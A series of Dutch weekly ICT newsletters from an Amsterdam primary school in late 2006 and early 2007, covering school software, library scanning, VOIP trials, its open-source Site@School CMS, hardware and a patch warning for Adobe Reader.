Deze week zijn de kleuters ingevoerd of doorgeschoven in het rekenprogramma "Alles Telt". Op zich is dat niet ingewikkeld of moeilijk. Maar we willen ook altijd overzichten: welk pictogram heeft een leerling, zodat een leerling (kleuter) weet welk symbool hij/zij moet aanklikken. Die pictogrammen moeten we handmatig in een tekstdocument zetten. En niet alle pictogrammen die het programma automatisch toekent aan een kind hebben we in ons pictogrammenbestand. Dus moet dat allemaal met de hand worden aangepast. Misschien is het ondertussen verbeterd: levert het programma zelf een net overzicht??? Wij hebben het nog niet kunnen ontdekken.
Na het opnieuw invoeren bleek, dat er 2 groepen in het leerkrachten gedeelte zo waren ingesteld, dat kinderen zouden worden opgeroepen. (afroeplijst)
Maar alleen de klassenleerkracht stond op de afroeplijst. Daardoor konden de leerlingen hun symbool niet vinden.
Gelukkig snel opgelost.

EDUCAT-b

De biblliotheekmoeders hebben nu een tweede computer bij het ruilen van de boeken. Bij de ene moeder worden de boeken in de computer ingeleverd en bij de andere moeder worden de boeken geleend.

Het enige dat nog mis gaat is, dat er boeken niet kunnen worden gevonden in het systeem. Die worden dan niet uitgeleend maar op een stapel 'uitzoeken' gelegd.

MET WOORDEN IN DE WEER

Op donderdag 16 november zijn alle scholen in Amsterdam uitgenodigd, die meedoen aan 'Met woorden in de weer'. Ja ja, weer een initiatief op de Rosa Boekdrukker. We willen uitzoeken of er knelpunten in het werken met woorden in de weer kunnen worden opgelost dmv  ICT. Volgende week meer hierover.
Belangstellenden zijn welkom om 15.30 uur. Graag wel even mailen, dat je komt. Dan zorgen we voor extra stoelen.

INFORMATIE VOOR LEERKRACHTEN

Naar aanleiding van de vorige BIC hebben we 3 reacties gekregen om op onze sites leuke websites voor kinderen te zetten. Daarin moeten we nog schiften. Er moet ook een duidelijk opdracht voor kinderen zijn, als ze het internet opgaan. Niet: ga maar internetten.
Wie pakt dat leuk aan???

Er zijn ook zoveel leuke webites met informatie voor leerkrachten. Voor de groepen 3 die met Veilig Leren Lezen werken:
sint boekje suggesties
En voor allerlei leuke tips: kijk hier

NOT 2007

In het laatste vakbondsblad zat een blad waarmee je gratis toegangskaarten voor de Nationale Onderwijs Tentoonstelling kon aanvragen. We bestelden er 4. In januari vindt dat plaats in Utrecht. We zullen tzt meer laten weten over onze snode plannen.

VIVES

In de VIVES is een rubriek: dit is onze school. Wij hebben ons daar afgelopen week voor aangemeld. We willen graag vertellen, wat er op de Rosa B allemaal gebeurt op ICT gebied. Natuurlijk houdt dat ook in : vertellen over SiteatSchool en ServeropSchool.

ERGONOMIEK

We krijgen weer 5 anti-RSI matten voor personeelsleden die veel achter de computer zitten - op proef. De eerste proefpersoon heeft ondertussen de keyboard steun aangeschaft. Ook een muis met een enorme trackbal erop.

KRUKKEN

Er is een verzoek binnen gekomen om meer krukken te bestellen voor bij de computers. Ze bevallen goed. Wel goed aandraaien anders vlieg je naar beneden.

TECHNIEK

We experimenteren met VOIP (Voice over Internet Protocol). Daarmee kun je gratis telefoneren tussen computers. Binnen school hebben we 't al werkend. Als 't gaat zoals we willen kan VOIP in combinatie met TightVNC (een programma om een computer op afstand te bedienen) nog meer kosten besparen voor de ServerAtSchool scholen. Peter, onze systeembeheerder, kan dan vanuit Bussum  vrijwel alles doen op de server en de werkstations en een ICT-er helpen alsof hij naast haar/hem staat.

Groet en een goed weekend, Karin
Dirk

Als je een bijdrage aan de nieuwsbrief wilt leveren, of je wilt hem afzeggen, klik dan HIER.  

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-11-16 w46

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 46 - 2006 (17 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

PRESENTATIE

Gerda deed een presentatie met beamer en Impress (dat is het programma in de gratis OpenOffice Suite dat hetzelfde doet als Powerpoint) in de ouderkamer. Daartoe hadden we het nieuwe projectiescherm bevestigd en de kabeltjes naar de beamer klaargemaakt. Dat was een oud klusje dat er nog lag.
De presentatie ging prima.

TELEWERKEN

Karin hielp Gerard met de installatie van WinSCP. Hij kan nu ook van huis uit bij zijn documenten op school via een beveiligde (encrypted, versleutelde) verbinding.
Het is niet mogelijk dat, als je WinSCP gebruikt, anderen op jouw computer kunnen 'kijken'. Dat kan natuurlijk wel als de firewall in je computer niet goed staat ingesteld. Maar aan WinSCP zal het niet liggen.
De handleiding van WinSCP staat op onze eigen server onder:
http://rosaboekdrukker.net/doc/manual/winscp.html

EDUCAT-b

Oh! Wat hebben we weer geworsteld!

1. kunnen de leerlinggegevens uit ESIS overgeschreven worden binnen Educat? Nee. Alleen de eerste keer kunnen ze worden gebruikt. Daarna moet alles handmatig worden aangepast.

Onze vraag aan de mensen van Educat of dat kan worden aangepast werd niet begrepen. O, wat is het toch moeilijk om een vraag goed te formuleren. We gaan een cursus communicatie volgen....

2. De handscanner die was aangeschaft. Al voor de zomervakantie. Zonder even aan de Afdeling ICT te vragen of zo'n ding bij ons werkt. Vraag: "Doet die het???" Dirk heeft veel geduld... Krijgt 'm niet aan de praat. Belt met Educat. Oh, de Zebex handscanner? Nee, die gebruiken we niet... Wij gebruiken de Metrologic met een xyz plugje. Hm.. zoeken... Op de site van Educat wordt de Zebex scanner wèl genoemd, inclusief de protocollen. Niet hoe je 'm aan de praat krijgt.
We hadden een scanner zonder gebruiksaanwijzing gekregen. En dan? Google. En hij werkt!!! Als je eenmaal weet hoe, is de Zebex handscanner simpel aan de praat te krijgen. Nu moet Maarten de bibliotheekdames trainen om labels te printen en in de boeken te plakken. We zulen het horen.

MET WOORDEN IN DE WEER

Op de eerste bijeenkomst om uit vinden of er gebruik gemaakt kan worden van computers voor 'met woorden in de weer' was flinke belangstelling vanuit het amsterdamse onderwijs. Karin en Dirk vertelden over waarom er bij ons software wordt ontwikkeld en hoe we onze lessen leerden over hoe je dat moet doen: namelijk tezamen met veel betrokkenen. We hebben met elkaar geïnventariseerd waar de knelpunten bij het werken met 'met woorden in de weer' liggen een waar computers misschien iets kunnen helpen.
Iedereen deed heel enthousiast mee. Afgesproken is dat de betrokken taalcoördinatoren terugkoppelen naar hun achterban en alle nieuwe informatie die we gaven en uitwisselden zullen overdenken. Half januari is er een nieuwe bijeenkomst.

INFORMATIE VOOR LEERKRACHTEN

Op www.digischool.nl kun je je aanmelden bij DOCENTEN voor "communities" van de jaargroep waarmee je werkt. Er zijn veel leuke suggesties en werkbladen door en voor collega's. Ga erheen en REGISTREER je!. Kijk hoe leuk anderen lesstof verzinnen! Ga niet altijd een wiel uitvinden!!!

VIVES

In de VIVES is een rubriek: dit is onze school. Wij hebben ons daar vorige week voor aangemeld. Onze brief wordt doorgestuurd naar de redactie. We hopen, dat we benaderd zullen worden voor een interview.

KLASSENMANAGEMENT EN ICT

Deze week is het arrangement (een soort afsprakenlijst) ingediend bij de begeleiders van het project 'klassenmanagement en ICT'. We willen in eerste instantie boven water krijgen waarom alle nascholingen, begeleidingen, handleidingen, aanwijzingen etc. etc. er niet toe hebben geleid, dat de ict-leerlijn geïmplementeerd is. Op 29 november is er een landelijke bijeenkomst in Zwolle waar we een soort 'aftrap'zullen krijgen. Wordt vervolgd.

TECHNISCHE INFORMATIE

SERVERATSCHOOL

Peter worstelt door met XP onder S#S http://serveropschool.nl en is op dit moment in C een programmaatje aan het schrijven. Naam:

SABRE: A tool to help cut through the Registry after SABRINE restored an image. SABRINE (Semi Automatic Backup and Restore in a Network Environment) is ons programma waarmee op school images worden gemaakt, op de server worden gezet en vervolgens door kleuters kunnen worden teruggezet op de werkstations.

Wat kan met SABRE?
- de naam van de computer goed zetten
- de SID veranderen
- en vervolgens de machine rebooten.
- dit alles wordt gelogd in /var/log/messages op de server

Uiteraard is SABRE OSS/GPL.

SITEATSCHOOL

We hebben versterking gekregen van Hans. Hij reageerde op een oproep in een Linux nieuwsgroep waarin we hulp vroegen bij het testen van de nieuwe code van Site@School. Hij was zeer bereid in Fred's code te kijken en een aantal bruikbare aanbevelingen te doen. Die aanbevelingen nemen we mee in een plan van aanpak waarmee Fred in de komende tijd alle code van S@S te lijf gaat. Een omvangrijk project waarmee S@S veiliger zal worden. Tegelijk voert Fred een aantal kleine features uit die er nog lagen.

Groet en een goed weekend, Karin
Dirk

Als je een bijdrage aan de nieuwsbrief wilt leveren, of je wilt hem afzeggen, klik dan HIER.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-11-23 w47

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 47 - 2006 (24 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

KLASSENMANAGEMENT EN ICT

Het convenant is getekend en in tweevoud de deur uit. Volgende week gaan we naar de 'aftrap' bijeenkomst in Zwolle. Dus over een week meer hierover.

BOA - CONSTRUCTIE

Er is een  project Breedbandnetwerk Onderwijs Amsterdam van start gegaan. De bedoeling is onze scholen te verglazen. Aangeraden wordt om voorlopig niet op aanbiedingen van Internet providers (lees KPN) in te gaan. Lees meer hierover op hun site.

BELGISCHE SOFTWARE

De Vlaamse overheid pakt Open Bron  Software beter aan dan de Nederlandse.  Alle scholen aldaar  kregen CD's toegestuurd. Citaat van de (prachtige ) CD cover: "De publicatie maakt deel uit van een brede campagne om vrije software bekend te maken in het onderwijs en om scholen te ondersteunen bij het keuzeproces van kwaliteitsvolle software".  Is dit wellicht een klusje voor onze nieuwe CDA/PvdA/SP coalitie...
Onze Belgische collega Kurt, ja, die van http://www.digitaleschool.be  (mérite un détour),  stuurde ons de CD's . Dank Kurt! We maken graag reclame voor dit prima Overheidsinitiatief. De twee CD's staan klaar om gedownload te worden dankzij een Belgische school:
http://www.kwaliti.be/software/OSSLinux.iso; (Linux) href="http://www.kwaliti.be/software/OSSWin.iso, (windows) Zie ook verder onder, bij TECHNIEK

GRATIS WINDOWS VOOR SCHOLEN

Andermaal bewijst de redactie zijn onafhankelijkheid en maakt reclame voor de Monopolist.  't Is maar dat je het weet.
Voor scholen die Pentium III computers hebben is Windows 2000 gratis te verkrijgen.  Onze Belgische collega's, die met zeer veel lagere ICT budgetten moeten werken dan wij Hollanders, maakten ons erop attent. Eigenlijk zou je nu je slag moeten slaan. Snelle PIII's,  tweedehands kosten ze vrijwel niets. W2000 erop en je bent voor jaren klaar. http://www.microsoft.com/education/freshstart/freshstart.asp

TECHNIEKTECHNIEKTECHNIEKTECHNEIKTECHNIEKTECHNIEKTECHNIEK

BELGISCHE SOFTWARE

Bij de software zat ook een Linux CD. Effe proberen...CD in de gleuf... ...Vier minuten later staat er een prima Belgisch Linux werkstation, boordevol educatieve software, konden we internetten, mailen en wat een mens verder zoal achter een computer doet.

Eén ding is echter jammer: dat de Nederlandse scholen zozeer aan de leiband van de Nederlandse educatieve uitgevers lopen.

PRINTERS

Onze trouwe werkpaarden die we van een bekende gemeentelijke dienst kregen, draaien al jaren goed met minimaal onderhoud. Deze week moest 1 een nieuwe  tonercartridge hebben en de ander produceerde verkreukeld papier. Gelukkig hebben we de printers in voorrraad, dus zetten we een nieuw oud werkpaard neer. Eens kijken wat we met de papierkreukelaar doen... De vorige keer, toen we onze 6 werkpaarden opnieuw lieten beslaan kostte dat € 250.

VRAGEN, VRAGEN, VRAGEN

Van één van onze zeer gewaardeerde lezers onvingen wij vragen over  VOIP:

V: Hoe jullie 't hebben ingeregeld? A: http://www.openh323.org/ ; met ohphone.
V: Handsets of koptelefoon/microfoon via de pc? A: laatste.
V: Welk programma gebruiken jullie? Skype? MSN? (Nét echt!!!Hahaha!). A: je zou beter moeten weten: OSS/GPL
V: Kunnen jullie ook naar 'buiten' bellen? A: nog niet, we experimenteren.
V: En zijn er nog abonnementskosten (ISP, programma, etc)? A: Nee, dat willen we niet.
V: Nog andere zaken die ik vergeet? A: Eh ...ehm.... zijn we vergeten.
De lezer merkte nog op:
"Bij ons op school al jaren gezeur om telefoons in elke klas + centralemaar zoals altijd: geen geld... VOIP is natuurlijk een buitenkansje!"
Wij: Ja, maar je moet er wel wat energie in steken. Heb je zin?

Verder had hij nog wat vragen naar aanleiding van onze info over onze ICT-krukken: Heb je over deze krukken informatie voor mij? Waar bestel je ze? Wat kosten ze? Wij gebruiken hier banken (ik stuur maar geen foto mee, dan krijg ik meteen de arbo op ons dak!) maar we zoeken al een tijd naar een goede vervanging waar kinderen van groep 3 t/m 8 aan kunnen werken. Antwoord: We hebben veel over de krukken gepubliceerd. Gebruik de zoekfunctie van Site@School en zoek in de nieuwsbrieven. Na vijf jaar zijn ze (die nieuwsbrieven) ook voor ons een enorme bron van info.

Hij had nog een vraag:
Bijna vergeten!
PS: ik zie op de foto van de kruk dat ook jullie je koptelefoontjes aan haakjes hebben hangen aan de monitoren. Mag ik vragen welke? De onze (Praxis) breken veeeeeel te snel af. We hebben er nu een paar van de Blokker op proef maar staan altijd open voor andere suggesties.
Antwoord: De haakjes zijn van aluminium en gekocht bij de ijzerwinkel. Bevestigd met een likje Bison Montagekit. Let wel op aan welke kant van de monitor je het haakje plaatst i.v.m. de lengte van de koptelefoonkabel en de plaats van de geluidskaart.  Als we een afgeschreven monitor wegdoen slaan we het haakje er met een baksteen af.  De haakjes overleven dit, de monitor soms niet. Zo worden de haakjes hergebruikt.

SERVARATSCHOOL EN MONITORHAAKJES

Aangezien de haakjes qua degelijkheid niet onderdoen voor de S#S software besloot het bestuur van de vereniging STRICT (Scholen Tezamen Rijk met ICT http://serveropschool.nl ) dat de eerste nieuwe school die ServerAtSchool gebruikt de haakjes gratis op de monitoren krijgt.

Groet en een goed weekend, Karin
Dirk

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen?  Klik dan HIER om dat te doen. Liever niet mailen, dat kost de redactie teveel tijd.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-11-27 w48

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 48 - 2006 (1 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Dit jaar geen BIC op rijm, want we denken er nu pas aan. En hij is klaar. Jammer.

ONZE BIBLIOTHEEK

Vorige week liet onze bovenbouw coördinator met de beamer aan de leerkrachten van de groepen 3 t/m 8 zien, hoe je met EDUCAT-b zelf via de computer in de klas boeken kunt uitlenen.

KLASSENMANAGEMENT EN ICT

Gerard en Karin bezochten deze week de "aftrap" van het project Klassenmanagement met ICT. Het was een hele inspirerende dag. Er is al een verslag te lezen op de website van ICT op School.
Er was een school uit Groningen - de starter - die liet zien hoe hun onderwijs is ingericht, en dat ze heel veel gebruik maken van allerlei functionaliteiten van hun website. WAUW!!!!! Even kijken...........ze gebruiken Site@School! Ze meldden: we gebruiken Siteatschool, ontwikkeld door basisschool Rosa Boekdrukker uit Amsterdam. Nou, Gerard en Karin zaten helemaal te glunderen! Daarna liepen we echt flink vooruit met onze borst: er zat een badge op met obs Rosa Boekdrukker erop.
Wij zijn er achter gekomen, dat het ICT beleidsplan niet in de pas loopt met de werkwijze in de Rosa Boekdrukker. Het ICT-plan loopt te hard. We moeten dus het een en ander aanpassen.
We zullen ook kijken hoe we het klassenmanegementprogramma dat we met onze onderwijsbegeleidingsdienst volgen,  en het ICT project op elkaar afgestemd krijgen.
We zullen wekelijks berichten over de voortgang.

RSI

De firma Ergonomiek heeft weer toetsenborden en muizen e.d. gestuurd om door ons te laten uittesten. Wat ze er niet bijleverden waren de goede spullen om ze te laten werken onder Windows 98. Dat moeten ze wel doen, als ze de boel willen verkopen. Dus maar even een belletje naar hen, volgende week.

TECHNIEKTECHNIEKTECHNIEKTECHNEIKTECHNIEKTECHNIEKTECHNIEK

SITE@SCHOOL

Woensdagavond vergaderden Fred en Dirk  over het beleid van Site@School voor 2007. De nadruk ligt op het doorontwikkelen  van S@S, met name op het gebied van veiligheid en stabiliteit.  Daarvoor hebben we een plan opgesteld dat we in het komend jaar uitvoeren. We proberen eind 2007 een nieuwe versie (V2.5, V3?) uit te brengen.  Deze week werd ook een lang lopende kwestie tot een besluit gebracht: De roep om CSS wordt op een speciale wijze gehonoreerd.   We zijn blij  dat we een oplossing gevonden hebben die recht doet aan de complexiteit en de diversiteit van 'het'  onderwijs. Dank aan alle betrokkenen voor hun bijdragen. Vooral dank aan Peter die door zijn input de oplossing dichterbij bracht. Zie voor een uitweiding over CSS en onderwijs: http://wyxs.net/mansas/man2.5/sasped.html#h4 Met excuses voor de typo's.

Groet en een goed weekend, Karin
Dirk

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen?  Klik dan HIER om dat te doen. Liever niet mailen, dat kost de redactie teveel tijd.  

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-12-07 w49

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 49 - 2006 (8 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

FOTO'S OP DE WEBSITE

Voor de collega's van de Rosa Boekdrukker: als jullie foto's op de website zetten (heel fijn, dat jullie dat nu zelf kunnen!!!) komt er een melding bij ons binnen, dat er foto's geplaatst zijn. Er staat alleen niet bij waar. Zouden jullie dan een mailtje kunnen sturen waar ze zijn geplaatst? Dan zetten wij een linkje op de voorpagina, zodat de laatste foto's altijd snel te vinden zijn.

KLASSENMANAGEMENT EN ICT

Deze week zijn we bezig geweest om de vraagstelling voor het project duidelijk op papier te zetten. Het moet in een kant en klaar sjabloon passen en het valt niet mee om je probleemstelling in een andermans keurslijf te formuleren. Daarbij moet ook nog een urentabel worden ingevuld.  Nee, er moeten vijf tabellen worden ingevuld: doelen, resultaat, producten, activiteiten en middelen. Pittige kost, om alles zo uit te splitsen. We gaan er maandag mee verder, want we hadden niet genoeg tijd.

STRICT

De vereniging 'Scholen Tezamen Rijk met ICT' heeft nu ook een gironummer. Dat is mooi, want nu kan één van de doelstellingen van de vereniging vorm gegeven worden:
"Het beheren van een fonds waaruit ontwikkelingskosten van Open Source Software voor scholen bestreden kunnen worden."
Voor de gebruikers van bijvoorbeeld Site@School is dit van belang. Zij kunnen een donatie doen en de vereniging zorgt dat de gelden aan de ontwikkeling van Site@School besteed worden. Zo zou Fred eindelijk eens betaald kunnen worden voor zijn inspanningen.
Gegevens:
Scholen Tezamen Rijk met ICT
giro 5155248
Bussum
Vermeld beslist het project, dus bijvoorbeeld Site@School, ServerAtSchool op Linux werkstations, Edukitty, Met Woorden in de Weer, etcetera.

TECHNIEKTECHNIEKTECHNIEKTECHNEIKTECHNIEKTECHNIEKTECHNIEK

Deze week een keer geen techniek, maar een citaat over techniek naar aanleiding van de canon van de vaderlandse geschiedenis.

Geschiedenis wordt geschreven door alpha's, maar de geschiedenis wordt gemaakt door beta's. Die hebben het zwarte garen uitgevonden, en het buskruit.
             --Ronald Plasterk (in zijn column in 'Buitenhof') 22 oktober 2006

Zo missen wij Christiaan Huygens.

Groet en goed weekend, Karin
Dirk

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen?  Mail naar info@rosaboekdrukker.nl. Even niet via de 'Bijdrage' knop, want daar hebben we een probleempje mee.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

Nieuwsbrief opzeggen? Klik dan HIER om dat te doen.

2006-12-08 w49

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week50 - 2006 (15 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

LAATSTE SITES en NIEUWSBRIEVEN

Er is weer een nieuwe Veilig Leren Lezen nieuwsbrief van Zwijsen met veel leuke tips.
Ook eindelijk weer een aardrijkskunde nieuwsbrief.
De Klokhuisagenda is weer voor weken gepubliceerd. Dus voor alle leerkrachten zijn er weer bronnen voor inspiratie.

KLASSENMANAGEMENT EN ICT

Deze week zouden we de urentabel in orde maken voor het vervolg van het project. Maar door ziekte en invallen etc. kwam het er niet van. Misschien toch nog volgende week.

COMPLIMENT VOOR Siteatschool.

Regelmatig krijgen we complimenten over siteatschool. Hoe gemakkelijk het is hoe prettig het werkt, etc.
Dit is de laatste:

Vandaag is de site van De Kinderdagverblijven in Leiden, gemaakt met Site@School dus, de lucht in gegaan. Het URL is: http://www.dekinderdagverblijven.nl/ Mijn complimenten voor het cms. Het wordt razend snel opgepakt door de doorgaans onervaren gebruikers.

INTERNETVERBINDING

Medio 2007 loopt het gratis KPN internet abonnemt af. We ontvingen daarover post van BOA (breedbandnetwerk onderwijs amsterdam). Zie BIC week 47.
In Amsterdam wil men gezamenlijk voor alle scholen een glasvezelverbinding aanschaffen.
Deze week ontvingen we post van de KPN: het gratis aanbod wordt met drie jaar verlengd. Meteen daarop ook weer post van BOA met het dringende verzoek nog op geen enkel aanbod in te gaan, maar de ontwikkelingen van het glasvezel inititief af te wachten.
Wij zijn inmiddels wijs geworden en zullen zeker rustig afwachten. Onze XS4all verbinding bevalt uitstekend. En de snelheid ook, net zoals de service.

AANBIEDING!!!!! COMPUTERTAFEL VOOR 6 à 8 COMPUTERS

Stalen frame met rood multiplex opbouw. Formaat 180x350. Verhoogd middendeel met rooster voor kabeldoorvoer.
Zelf komen ophalen!
reacties naar Mariëtta Goossens 020 6822660 (ma t/m do) mail m.goossens@mainline.nl
Kijk hier voor foto.

TECHNIEKTECHNIEKTECHNIEKTECHNEIKTECHNIEKTECHNIEKTECHNIEK

LEESLADDER

Leesladder 1 blijft ons de laatste tijd achtervolgen met problemen. We hebben de database verwijderd, EDEX bestand geconverteert volgens methode Zwijsen, netjes opnieuw de leerlingen ingevoerd. Maar, na een paar minuten werken krijgt een leerling weer de foutmelding dat er onvoldoende opdrachten beschikbaar zijn. Heeft iemand er ervaring mee?
Het programma heeft een paar jaar zonder problemen gewerkt, maar sinds juni 2006 komt steeds die melding. Zwijsen kon niet helpen.

SITE@SCHOOL

S@S maakt gebruik van een slim systeem om alle programmabestanden in op te slaan en up to date te houden: CVS (Concurrent Versioning System). Het gemak van CVS is je verschillende versies van je software hebt, dat je met elkaar aan software kan werken en dat de hele wereld de laatste versie van de software zo kan downloaden. Dan moet je echter wel weten wat je doet. CVS is moeilijk. We proberen de S@S gebruikers een dagelijkse complete download als zip ter beschikking te stellen. Dirk probeert een script te schrijven om de 1500 files van het programma netjes in twee zips te krijgen. Zijn scripting kennis is zeer beperkt, dus we hadden de hele week geen last van hem. Waar Peter een uurtje over doet, zit hij al de hele week op te zwoegen.

Groet en goed weekend,
Karin
Dirk

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen? Mail naar info@rosaboekdrukker.nl. Even niet via de 'Bijdrage' knop, want daar hebben we een probleempje mee.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen? Klik dan HIER om dat te doen. Liever niet mailen, dat kost de redactie teveel tijd.

2006-12-21 w51

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 51 - 2006 (22 december)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

VIVES

De afdeling ICT werd deze week door de VIVES geinterviewd. Het nummer verschijnt in februari.

MET WOORDEN IN DE WEER

Bij deze methode kunnen oefeningen gedaan worden met het programma ZARB. Dat werkt alleen met  MS Word. Gelukkig hadden we dat nog op de plank liggen (met een deense licentie!!!) en installeerden het voor de leerkracht die zich ermee vertrouwd moet maken. Contact met de maker  van ZARB leverde op dat medio 2008  de oefeningen ook in Open Office beschikbaar zullen zijn en zelfs ook in een nederlandse versie.

LEESLADDER

De problemen lijken opgelost. Het bleek dat 700 plaatjes en geluiden niet geïnstalleerd waren. Dat komt doordat LL bij installatie de resolutie van het werkstation detecteert en dan de plaatjes met dié resolutie installeert. Wij kregen andere werkstations en daarna ging het dus mis. Enfin, weer snel opgelost door onze systeembeheereder.

TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK

NIEUW TEMPLATE VOOR ONZE SITE?

Er wordt gedacht over een nieuw template voor de OBSRB site. Het is goed om juist  dan weer eens een bezoekje te brengen aan webpagesthatsuck. Daar valt te lezen wat bedrijven zoal fout doen met hun webpagina's. Het wordt wel eens uit het oog verloren, dat een school geen bedrijf is. Daardoor komen soms merkwaardige opvattingen over webpagina's, ICT en Internet het onderwijs binnen. Hoe 'goede' webpagina's voor een school eruit zien, daar geeft deze site geen antwoord op. Tijd om er eens wat over te schrijven. De kerstvakantie lonkt...

Groet, goede vakantie, een zalich kerstfeest en een voorspoedig 2007, Karin
Dirk

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen?  Mail naar info@rosaboekdrukker.nl. Even niet via de 'Bijdrage' knop, want daar hebben we een probleempje mee.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen? Klik dan HIER om dat te doen. Liever niet mailen, dat kost de redactie teveel tijd.

2007-01-10 w02

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 2 - 2007 (12 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Een gezond, voorspoeding en ICT-rijk 2007 toegewenst.

PRINTERS 1e EN 2e VERDIEPING

We ontvangen soms documenten waarin de printers zich verslikken omdat het lettertype in het document verkeerd staat ingesteld. Dan staat op de printer 'LOAD LETTER' (laad papier met het amerkikaanse 'letter' formaat). Druk op het bedieningspaneel van de printer op SHIFT + Doorgaan om het document toch te printen.

NIEUWSBRIEF ZWIJSEN EN POLS

Er is weer een nieuwe nieuwsbrief van Zwijsen verschenen met allelerlei nuttige informatie over het aanvankelijk lezen. Ook de nieuwsbrief van Pols staat weer boordevol nuttige informatie voor het onderwijs.

BEELDBANK

Eindelijk hebben we de problemen rond beeldbank schooltv opgelost. Volgende week werkt ie onder IE en Firefox. Zie onder bij techniek.

MET WOORDEN IN DE WEER

We hadden weer een MWidW vergadering met andere amsterdamse scholen. Er is een werkgroepje opgericht om uit te werken hoe je via het web het 'invulschema semantiseren' (zie MWidW boek p. 96)  kunt vormgeven zodanig dat je een online database met semantiseringen hebt. We hebben besloten een mailinglijst te maken om effectief met elkaar te communiceren en meteen een mail archief  te hebben waar alle ideeën in staan. Een verslag volgt nog.

TAFELS AMBRASOFT

Groep 4 begint binnenkort aan het automatiseren van de tafels. Daarom zijn alle leerlingen van die groepen nu ingevoerd. De bollebozen kunnen al aan de slag.

EDUCAT-b

Het invoeren van enkele nieuwe leerlingen in Educat-b (het bibliotheekprogramma) hebben we nu uitgedokterd. De handleiding bij het programma is ontzettend lastig te lezen. Alleen de inhoudsopgave is al een puzzel. In een tweede handleiding, die apart gedownload moest worden (uitlenen met educat-b) is na veel gezoek te vinden hoe het moet. Daarna bleek, dat er een tweede wachtwoord ingevoerd moet worden om bij de uitleenbalie te komen. Het is een vak apart: zowel het schrijven van handleidingen als het lezen ervan.

TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK

BEELDBANK EN FIREFOX

Als boven beschreven doet de beeldbank het nu ook met Firefox. We vonden de goede handleiding op http://forums.mozillazine.org/viewtopic.php?t=206213 Nu zouden we graag de volgende stap zetten: IE en Firefox met een andere OSS mediaplayer. WMP is ons iets te speurneuzerig. Wie weet een goede handleidng om bijvoorbeeld  VLC Player of MPlayer werkend te krijgen met IE en FF onder Win98SE?

MONITOR STUK

't Komt niet vaak voor. Gelukkig hadden we ze nog in voorraad. Met dank aan de dienst Stadstoezicht.

ADOBE ACROBAT READER

Er is een ernstig veiligheidslek in AAR ontdekt. 'Via het beveiliginglek kunnen aanvallers door middel van een speciaal gemaakt PDF-bestand een pc overnemen.' Men raadt je aan om AAR te patchen, zie verder op http://www.virusalert.nl/?show=nieuws&id=1168  waaruit wij citeerden.

Een  andere oplossing, en ons inziens radicalere, is om AAR te vervangen door de Foxit Reader http://www.foxitsoftware.com. Werkt ook met IE en Firefox en is ook in het Nederlands verkrijgbaar. Gratis, zonder zo'n vervelend Acrobat opstartscherm, zeer snel startend, veilig. Voor belangstellenden ligt er een installatiehandleiding klaar.

VISTA

Het buzzword valt steeds vaker. Tijd voor een kritische beschouwing. Lees en huiver op: http://www.cs.auckland.ac.nz/~pgut001/pubs/vista_cost.txt . Wel even doorbijten... We zijn benieuwd naar het standpunt van Stichting ICT op School. We hopen dat we tot in lengte van jaren van Vista verschoond mogen blijven. Peter: "Vista reduceert leerlingen tot 'couch potatoes'".  In Engeland maakt het onderwijs zich ook zorgen. citaat:"... schools should avoid Vista for at least another year, since neither Vista nor Office 2007 offers any compelling reasons for schools to upgrade.

Groeten en goed weekend,
Karin
Dirk

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen?  Mail naar info@rosaboekdrukker.nl. Even niet via de 'Bijdrage' knop, want daar hebben we een probleempje mee.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen? Klik dan HIER om dat te doen. Liever niet mailen, dat kost de redactie teveel tijd.

2007-01-19 w03

